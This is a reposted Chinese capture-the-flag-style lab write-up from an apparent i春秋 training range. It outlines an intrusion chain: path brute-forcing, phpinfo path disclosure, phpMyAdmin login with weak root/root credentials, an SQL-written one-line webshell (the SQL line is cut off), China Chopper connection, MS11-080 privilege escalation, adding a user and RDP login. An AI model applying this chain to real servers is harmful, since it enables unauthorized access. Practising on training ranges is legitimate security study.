拿到靶场 直接进行扫描 爆破路径
发现 phpinfo, phpmyadmin 更具phpinfo 获取跟路径 也可以通过
输入错路径爆出绝对路径
phpmyamin 弱口令登录 root,root
sql 直接写一句话木马
select '
菜刀连接 上传 ms11080.exe 提权 添加 90sec 用
mstsc 直接远程登录
本文章为转载内容,我们尊重原作者对文章享有的著作权。如有内容错误或侵权问题,欢迎原作者联系我们进行内容更正或删除文章。
i春秋DMZ大型靶场实验(二)提权漏洞
转载
提问和评论都可以,用心的回复会被更多人看到
评论
发布评论
相关文章
-
I春秋—— Crypto Write up(一)
前言:密码学涉及一系列的加密算法,虽然自己数学贼烂,但觉得加密这些算法还是蛮好玩的,就通过题来了解一些算法,话不多说,开始做题。
Crypto 非对称加密 对称加密 百度 封装
